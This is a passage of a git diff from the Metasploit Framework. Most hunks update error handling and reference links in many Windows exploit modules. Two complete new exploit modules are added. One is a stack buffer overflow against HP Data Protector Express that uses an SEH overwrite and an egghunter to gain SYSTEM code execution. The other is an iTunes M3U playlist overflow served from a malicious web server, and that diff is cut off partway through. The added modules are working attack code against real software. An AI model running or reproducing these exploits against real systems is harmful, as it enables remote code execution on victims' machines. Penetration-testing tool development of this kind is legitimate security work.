+ fail_with(Exploit::Failure::Unknown, "The server doesn't appear to be running a vulnerable version of HTTPDX")
end
re = Regexp.new(Regexp.escape(version)+' - ', true)
@@ -179,7 +179,7 @@ For now, that will have to be done manually.
end
if (not mytarget)
- raise RuntimeError, 'Unable to automatically detect exploitation parameters'
+ fail_with(Exploit::Failure::Unknown, 'Unable to automatically detect exploitation parameters')
end
print_status("Selected Target: #{mytarget.name}")
diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb
index 9ef4706325..1207678638 100644
--- a/modules/exploits/windows/http/integard_password_bof.rb
+++ b/modules/exploits/windows/http/integard_password_bof.rb
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not mytarget
- raise RuntimeError, "Unable to automatically detect the target version"
+ fail_with(Exploit::Failure::NoTarget, "Unable to automatically detect the target version")
end
print_status("Selected Target: #{mytarget.name}")
diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb
index 3c3b54d4db..1208018363 100644
--- a/modules/exploits/windows/http/mcafee_epolicy_source.rb
+++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2006-5156' ],
[ 'OSVDB', '29421' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/2467' ],
+ [ 'EDB', '2467' ],
[ 'URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ],
[ 'BID', '20288' ],
],
diff --git a/modules/exploits/windows/http/netdecision_http_bof.rb b/modules/exploits/windows/http/netdecision_http_bof.rb
index e5e9419906..81db81cb0d 100644
--- a/modules/exploits/windows/http/netdecision_http_bof.rb
+++ b/modules/exploits/windows/http/netdecision_http_bof.rb
@@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ ['CVE', '2012-1465'],
['OSVDB', '79651'],
['URL', 'http://secunia.com/advisories/48168/'],
['URL', 'http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt']
diff --git a/modules/exploits/windows/http/novell_imanager_upload.rb b/modules/exploits/windows/http/novell_imanager_upload.rb
index f6cef8f099..616e383419 100644
--- a/modules/exploits/windows/http/novell_imanager_upload.rb
+++ b/modules/exploits/windows/http/novell_imanager_upload.rb
@@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 5)
handler
else
- raise RuntimeError, 'POST failed'
+ fail_with(Exploit::Failure::Unknown, 'POST failed')
end
end
diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb
index 25f079bd25..2e77f702e3 100644
--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'win'
windows_stager
else
- raise RuntimeError, 'Target not supported.'
+ fail_with(Exploit::Failure::Unknown, 'Target not supported.')
end
handler
diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb
index 8e6090b5a1..104dfdba0f 100644
--- a/modules/exploits/windows/http/psoproxy91_overflow.rb
+++ b/modules/exploits/windows/http/psoproxy91_overflow.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2004-0313' ],
[ 'OSVDB', '4028' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/156' ],
+ [ 'EDB', '156' ],
[ 'BID', '9706' ],
],
'DefaultOptions' =>
diff --git a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb
index 8d1efb4ca4..fbea3a7691 100644
--- a/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb
+++ b/modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb
@@ -141,12 +141,12 @@ class Metasploit4 < Msf::Exploit::Remote
abort("Exploit not complete, check credentials")
elsif body.match(/Permission denied/i)
print_error("[SAP] The Supplied credentials are valid, but lack OSExecute permissions")
- raise RuntimeError.new("Exploit not complete, check credentials")
+ fail_with(Exploit::Failure::NoAccess, "Exploit not complete, check credentials")
end
end
rescue ::Rex::ConnectionError
- print_error("[SAP] Unable to attempt authentication")
+ fail_with(Exploit::Failure::Unreachable, "Could not access SAP service")
break
end
end
diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb
index b4375c26e2..bb00538437 100644
--- a/modules/exploits/windows/http/savant_31_overflow.rb
+++ b/modules/exploits/windows/http/savant_31_overflow.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2002-1120' ],
[ 'OSVDB', '9829' ],
[ 'BID', '5686' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/787' ],
+ [ 'EDB', '787' ]
],
'Privileged' => false,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb
index 1c213bdf4a..e21bfa14c8 100644
--- a/modules/exploits/windows/http/xitami_if_mod_since.rb
+++ b/modules/exploits/windows/http/xitami_if_mod_since.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '40594'],
[ 'OSVDB', '40595'],
[ 'BID', '25772' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/4450' ],
+ [ 'EDB', '4450' ]
],
'Privileged' => false,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
index bb4b815721..a700b41e53 100644
--- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb
+++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
@@ -173,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote
# try to detect the windows directory
@win_dir = detect_windows_dir()
if not @win_dir
- raise RuntimeError, "Unable to detect the target host windows directory (maybe not vulnerable)!"
+ fail_with(Exploit::Failure::NoTarget, "Unable to detect the target host windows directory (maybe not vulnerable)!")
end
end
print_status("Using windows directory \"#{@win_dir}\"")
diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb
index 9b875e9e6f..56bfec8eb0 100644
--- a/modules/exploits/windows/imap/eudora_list.rb
+++ b/modules/exploits/windows/imap/eudora_list.rb
@@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
if mytarget
print_status("Automatically detected \"#{mytarget.name}\" ...")
else
- raise RuntimeError, 'Unable to automatically detect a target'
+ fail_with(Exploit::Failure::NoTarget, 'Unable to automatically detect a target')
end
else
mytarget = target
diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb
index 89709b6ceb..3999c24baf 100644
--- a/modules/exploits/windows/imap/mdaemon_fetch.rb
+++ b/modules/exploits/windows/imap/mdaemon_fetch.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-1358' ],
[ 'OSVDB', '43111' ],
[ 'BID', '28245' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/5248' ],
+ [ 'EDB', '5248' ]
],
'Privileged' => false,
'DefaultOptions' =>
diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb
index f7ff09c881..8f7c40e291 100644
--- a/modules/exploits/windows/isapi/w3who_query.rb
+++ b/modules/exploits/windows/isapi/w3who_query.rb
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if not mytarget
- raise RuntimeError, "No valid target found"
+ fail_with(Exploit::Failure::NoTarget, "No valid target found")
end
buf = rand_text_english(8192, payload_badchars)
diff --git a/modules/exploits/windows/lotus/lotusnotes_lzh.rb b/modules/exploits/windows/lotus/lotusnotes_lzh.rb
index 517d696d2d..91a71e3077 100644
--- a/modules/exploits/windows/lotus/lotusnotes_lzh.rb
+++ b/modules/exploits/windows/lotus/lotusnotes_lzh.rb
@@ -157,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Waiting for a payload session (backgrounding)...")
if not datastore['ExitOnSession'] and not job_id
- raise RuntimeError, "Setting ExitOnSession to false requires running as a job (exploit -j)"
+ fail_with(Exploit::Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
end
stime = Time.now.to_f
diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb
index e278020b99..45b3c6590d 100644
--- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb
+++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2007-6166' ],
[ 'OSVDB', '40876' ],
[ 'BID', '26549' ],
- [ 'URL', 'http://milw0rm.com/exploits/4648' ],
+ [ 'EDB', '4648' ],
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/misc/avidphoneticindexer.rb b/modules/exploits/windows/misc/avidphoneticindexer.rb
index 7fd8cc6449..47278ff1bd 100644
--- a/modules/exploits/windows/misc/avidphoneticindexer.rb
+++ b/modules/exploits/windows/misc/avidphoneticindexer.rb
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
+ ['CVE', '2011-5003'],
['OSVDB', '77376'],
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf' ],
],
diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb
index e08efdcde5..a5f443ea09 100644
--- a/modules/exploits/windows/misc/bopup_comm.rb
+++ b/modules/exploits/windows/misc/bopup_comm.rb
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2009-2227' ],
[ 'OSVDB', '55275' ],
[ 'URL', 'http://www.blabsoft.com/products/server' ],
- [ 'URL', 'http://milw0rm.com/exploits/9002' ],
+ [ 'EDB', '9002' ]
],
'DefaultOptions' =>
{
diff --git a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb
new file mode 100644
index 0000000000..c147b5f62f
--- /dev/null
+++ b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb
@@ -0,0 +1,274 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Seh
+ include Msf::Exploit::Remote::Egghunter
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'HP Data Protector Create New Folder Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in HP Data Protector 5. The overflow
+ occurs in the creation of new folders, where the name of the folder is handled in a
+ insecure way by the dpwindtb.dll component. While the overflow occurs in the stack, the
+ folder name is split in fragments in this insecure copy. Because of this, this module
+ uses egg hunting to search a non corrupted copy of the payload in the heap. On the other
+ hand the overflowed buffer is stored in a frame protected by stack cookies, because of
+ this SEH handler overwrite is used.
+
+ Any user of HP Data Protector Express is able to create new folders and trigger the
+ vulnerability. Moreover, in the default installation the 'Admin' user has an empty
+ password. Successful exploitation will lead to code execution with the privileges of
+ the "dpwinsdr.exe" (HP Data Protector Express Domain Server Service) process, which
+ runs as SYSTEM by default.
+ },
+ 'Author' =>
+ [
+ 'juan vazquez',
+ 'sinn3r'
+ ],
+ 'Version' => '$Revision: $',
+ 'References' =>
+ [
+ [ 'CVE', '2012-0124' ],
+ [ 'OSVDB', '80105' ],
+ [ 'BID', '52431' ],
+ [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03229235' ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 2000,
+ 'BadChars' => "\x00\x2f\x5c",
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ ['HP Data Protector Express 5.0.00.59287 / Windows XP SP3',
+ {
+ 'Ret' => 0x66dd3e49, # ppr from ifsutil.dll (stable over windows updates on June 26, 2012)
+ 'Offset' => 2730
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Mar 12 2012'
+ ))
+ register_options(
+ [
+ Opt::RPORT(3817),
+ OptString.new('USERNAME', [ true, 'The username to authenticate as','Admin' ]),
+ OptString.new('PASSWORD', [ false, 'The password for the specified username','' ])
+ ], self.class)
+ end
+
+ # dpwinsup!SvcEncrypt2
+ def encrypt_password(password)
+ if not password or password.empty?
+ return ""
+ end
+
+ result = ""
+ count = 0x80
+
+ i = 0
+ dl = 0
+ al = password.unpack("C*")[i]
+
+ while count > 2
+ al = al + dl
+ if al >= 0x100 then al = al - 0x100 end
+ al = al + 0x22
+ if al >= 0x100 then al = al - 0x100 end
+ al = al ^ 0x2b
+ if al >= 0x100 then al = al - 0x100 end
+ al = al + 0x4c
+ if al >= 0x100 then al = al - 0x100 end
+ al = al ^ 0x5f
+ if al >= 0x100 then al = al - 0x100 end
+ al = al - dl
+ if al >= 0x100 then al = al - 0x100 end
+ bl = al
+ if bl >= 0x100 then bl = bl - 0x100 end
+ bl = bl >> 4
+ if bl >= 0x100 then bl = bl - 0x100 end
+ bl = bl + 0x41
+ if bl >= 0x100 then bl = bl - 0x100 end
+ result << [bl].pack("C")
+ al = al & 0xf
+ if al >= 0x100 then al = al - 0x100 end
+ al = al + 0x41
+ if al >= 0x100 then al = al - 0x100 end
+ i = i + 1
+ result << [al].pack("C")
+ dl = dl + 5
+ if dl >= 0x100 then dl = dl - 0x100 end
+ count = count - 2
+ if i >= password.length
+ return result
+ end
+ al = password.unpack("C*")[i]
+
+ end
+ return result
+ end
+
+ def exploit
+ connect
+
+ machine_name = rand_text_alpha(15)
+
+ print_status("#{sock.peerinfo} - Sending Hello Request")
+
+ hello = "\x54\x84\x00\x00\x00\x00\x00\x00" << "\x00\x01\x00\x00\x92\x00\x00\x00"
+ hello << "\x3a\x53\xa5\x71\x06\x20\x80\x00" << "\x6a\x02\xaf\x03\xf8\xc5\xc7\x02"
+ hello << "\x01\x00\x00\x00\xc0\xa8\x01\x85" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ hello << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ hello << "\x00\x00\x00\x00\x01\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ hello << "\x00\x00\x00\x00"
+ hello << machine_name << "\x00"
+ hello << "\x5b\x2e\xad\x71\x50\x03\x00\x00" << "\xff\xff\x00\x00\x06\x10\x00\x44"
+ hello << "\x74\x62\x3a\x20\x43\x6f\x6e\x74" << "\x65\x78\x74\x00\xf8\x31\x0a\x10"
+ hello << "\x50\x03\x00\x00\xff\xff\x00\x00" << "\x06\x10\x00\x00\x6c\xfa"
+
+ sock.put(hello)
+ hello_response = sock.get
+
+ if not hello_response or hello_response.empty?
+ print_error("#{sock.peerinfo} - The Hello Request haven't had response")
+ return
+ end
+
+ print_status("#{sock.peerinfo} - Sending Authentication Request")
+
+ auth = "\x51\x84\x00\x00\x02\x02\x02\x32" << "\x18\x00\x00\x00\xa4\x01\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ auth << "\x00\x00\x00\x00\x01\x10\x00\x00" << "\xd1\x00\x97\x4e\xb8\xe7\x03\x00"
+ auth << "\xd5\x21\xe6\xff"
+
+ user = datastore['USERNAME']
+ pass = encrypt_password(datastore['PASSWORD'])
+ auth[20, user.length] = user
+ if pass and not pass.empty?
+ auth[276, pass.length] = pass
+ end
+
+ sock.put(auth)
+ auth_response = sock.get
+ if not auth_response or auth_response.empty?
+ print_error("#{sock.peerinfo} - The Authentication Request haven't had response")
+ return
+ end
+
+ print_status("#{sock.peerinfo} - Sending Token Request")
+ request_token = "\x51\x84\x00\x00\x02\x02\x02\x32" << "\x02\x00\x00\x00\x24\x00\x00\x00"
+ request_token << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ request_token << "\x07\x00\x00\x00"
+
+ sock.put(request_token)
+ response_token = sock.get
+ if not response_token or response_token.empty?
+ print_error("#{sock.peerinfo} - The Token Request haven't had response")
+ return
+ end
+
+ print_status("#{sock.peerinfo} - Sending Home Identifier Request")
+ request_home_identifier = "\x51\x84\x00\x00\x02\x02\x02\x32" << "\x03\x00\x00\x00\x30\x00\x00\x00"
+ request_home_identifier << "\x00\x00\x00\x00"
+ request_home_identifier << response_token[-8,8]
+ request_home_identifier << "\x02\x10\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x01\x00\xff\xff"
+ request_home_identifier << "\x00\x00\x00\x00"
+
+ sock.put(request_home_identifier)
+ response_home_identifier = sock.get
+ if not response_home_identifier or response_home_identifier.empty?
+ print_error("#{sock.peerinfo} - The Home Identifier Request haven't had response")
+ return
+ end
+
+ print_status("#{sock.peerinfo} - Sending Home Contents Request")
+ request_home_contents = "\x51\x84\x00\x00\x02\x02\x02\x32" << "\x04\x00\x00\x00\x3c\x00\x00\x00"
+ request_home_contents << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ request_home_contents << response_token[-8,8]
+ request_home_contents << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x02\x10\x00\x00"
+ request_home_contents << response_home_identifier[24,9] << "\00\x00\x00\x00\x0d\x00\x00"
+
+ sock.put(request_home_contents)
+ response_home_contents = sock.get
+ if not response_home_contents or response_home_contents.empty?
+ print_error("#{sock.peerinfo} - The Home Contents Request haven't had response")
+ return
+ end
+
+ hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true, :eggtag => 'w00t' })
+ my_payload = egg
+ my_payload << rand_text(target['Offset']-my_payload.length)
+ my_payload << generate_seh_record(target.ret)
+ my_payload << hunter
+
+ print_status("#{sock.peerinfo} - Sending Create Object Request")
+ create_object_request = "\x51\x84\x00\x00\x02\x02\x02\x32" << "\x06\x00\x00\x00\x39\x11\x00\x00"
+ create_object_request << "\x00\x00\x00\x00"
+ create_object_request << response_token[-8,8]
+ create_object_request << response_home_contents[20, 14] << "\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x20\x03\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00\x00\x00\x00\x00"
+ create_object_request << "\x00\x00\x00\x00\x00\x00\x00\x00" << "\x00\x00\x00\x00"
+ create_object_request << my_payload << "\x00"
+
+ create_object_request[12, 4] = [create_object_request.length].pack("V")
+
+ sock.put(create_object_request)
+
+ disconnect
+ end
+end
diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb
index 7d3947bb2d..acaa3e49b4 100644
--- a/modules/exploits/windows/misc/hp_omniinet_1.rb
+++ b/modules/exploits/windows/misc/hp_omniinet_1.rb
@@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
if not resp
- raise RuntimeError, "No version response returned."
+ fail_with(Exploit::Failure::Unknown, "No version response returned.")
end
resp = resp.unpack('v*').pack('C*')
@@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb
index 6c5dc2f0ff..406264f02f 100644
--- a/modules/exploits/windows/misc/hp_omniinet_2.rb
+++ b/modules/exploits/windows/misc/hp_omniinet_2.rb
@@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
if not resp
- raise RuntimeError, "No version response returned."
+ fail_with(Exploit::Failure::Unknown, "No version response returned.")
end
resp = resp.unpack('v*').pack('C*')
@@ -161,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
if (not mytarget)
- raise RuntimeError, "No matching target"
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
end
print_status("Selected Target: #{mytarget.name}")
diff --git a/modules/exploits/windows/misc/itunes_extm3u_bof.rb b/modules/exploits/windows/misc/itunes_extm3u_bof.rb
new file mode 100644
index 0000000000..b8e4444138
--- /dev/null
+++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb
@@ -0,0 +1,283 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Apple iTunes 10 Extended M3U Stack Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7.
+ When opening an extended .m3u file containing an "#EXTINF:" tag description,
+ iTunes will copy the content after "#EXTINF:" without appropriate checking
+ from a heap buffer to a stack buffer, writing beyond the stack buffer's boundary,
+ which allows code execution under the context of the user.
+
+ Please note before using this exploit, you must have precise knowledge of the
+ victim machine's QuickTime version (if installed), and then select your target
+ accordingly.
+
+ In addition, even though this exploit can be used as remote, you should be aware
+ the victim's browser behavior when opening an itms link. For example,
+ IE/Firefox/Opera by default will ask the user for permission before launching the
+ itms link by iTunes. Chrome will ask for permission, but also spits a warning.
+ Safari would be an ideal target, because it will open the link without any
+ user interaction.
+ },
+ 'Author' =>
+ [
+ 'Rh0 ', # discovery and metasploit module
+ 'sinn3r' #Mo' targets & code cleanup, etc
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ 'InitialAutoRunScript' => 'migrate -f'
+ },
+ 'Platform' => ['win'],
+ 'Arch' => ARCH_X86,
+ 'Payload' =>
+ {
+ 'Space' => 1000,
+ 'BadChars' => "\x00\x0a\x0d",
+ 'DisableNops' => true,
+ 'PrependEncoder' => "\x81\xc4\xfc\xfb\xff\xff" # ADD ESP, -0x404
+ },
+ 'References' =>
+ [
+ [ 'OSVDB', '83220' ],
+ [ 'EDB', '19322' ],
+ [ 'URL', 'http://pastehtml.com/view/c25uhk4ab.html' ]
+ ],
+ 'DisclosureDate' => "Jun 21 2012",
+ 'Targets' =>
+ [
+ # Default package for iTunesSetup104.exe
+ ['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3',
+ {
+ 'Ret' => 0x669C197B, # ADD ESP,0xD40 / ret [QuickTime.qts]
+ 'ROP_NOP' => 0x66801044 # RET
+ }
+ ],
+ # Default package for iTunesSetup1041.exe
+ [ 'iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3',
+ {
+ 'Ret' => 0x6693A96B, # ADD ESP,0xD40 / ret [QuickTime.qts]
+ 'ROP_NOP' => 0x66801044 # RET
+ }
+ ],
+ [ 'iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3',
+ {
+ 'Ret' => 0x6693ACBB, # ADD ESP,0xD40 / ret [QuickTime.qts]
+ 'ROP_NOP' => 0x66801044 # RET
+ }
+ ],
+ ['iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3',
+ {
+ 'Ret' => 0x6693afab, # ADD ESP,0xD40 / ret [QuickTime.qts]
+ 'ROP_NOP' => 0x66801044 # RET
+ }
+ ]
+ ]
+ ))
+ end
+
+
+ def on_request_uri(cli,request)
+ # re-generate the payload
+ return if ((p = regenerate_payload(cli).encoded) == nil)
+
+ host = request.headers['HOST']
+ agent = request.headers['USER-AGENT']
+
+ # iTunes browser link
+ m3u_location = "itms://#{host}#{get_resource()}/#{rand_text_alphanumeric(8+rand(8))}.m3u"
+
+ if request.uri =~ /\.ico$/i
+ # Discard requests for ico files
+ send_not_found(cli)
+ elsif request.uri =~ /\.m3u$/i
+ print_status("Target: #{target.name}")
+ print_status("Sending playlist")
+ send_response(cli, generate_m3u(p), { 'Content-Type' => 'audio/x-mpegurl' })
+ elsif agent =~ /MSIE (6|7|8)\.0/ and agent =~ /NT 5\.1/
+ print_status("Redirecting to playlist")
+ send_response(cli, generate_redirect_ie(m3u_location), { 'Content-Type' => 'text/html' })
+ elsif agent =~ /NT 5\.1/
+ # redirect Firefox, Chrome, Opera, Safari to iTunes link
+ print_status("Redirecting to playlist")
